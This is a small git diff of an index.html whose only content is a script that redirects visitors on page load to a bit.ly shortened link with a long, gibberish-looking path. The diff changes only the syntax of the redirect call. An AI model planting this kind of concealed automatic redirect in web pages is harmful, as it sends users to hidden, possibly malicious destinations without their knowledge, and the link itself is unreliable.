--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 
 <html> 
 <script>
-  location.replace("https://bit.ly/jihefefe788efueie6768dwdjkdwjkqvbeouihefefe788efueie6768dwdjkdwjkqvbeouuyuyveuevwhhiudyuiiueuieui9828329983uewiufewivbfsdbudsvcudvcusdvcudscvdsuvcudvcucdusyuedvieydvi2389328329832hdbbjdbjsxkbwjxwkjbwkxjw");
+  window.location.replace("https://bit.ly/jihefefe788efueie6768dwdjkdwjkqvbeouihefefe788efueie6768dwdjkdwjkqvbeouuyuyveuevwhhiudyuiiueuieui9828329983uewiufewivbfsdbudsvcudvcusdvcudscvdsuvcudvcucdusyuedvieydvi2389328329832hdbbjdbjsxkbwjxwkjbwkxjw");
+
 </script>
 </html>
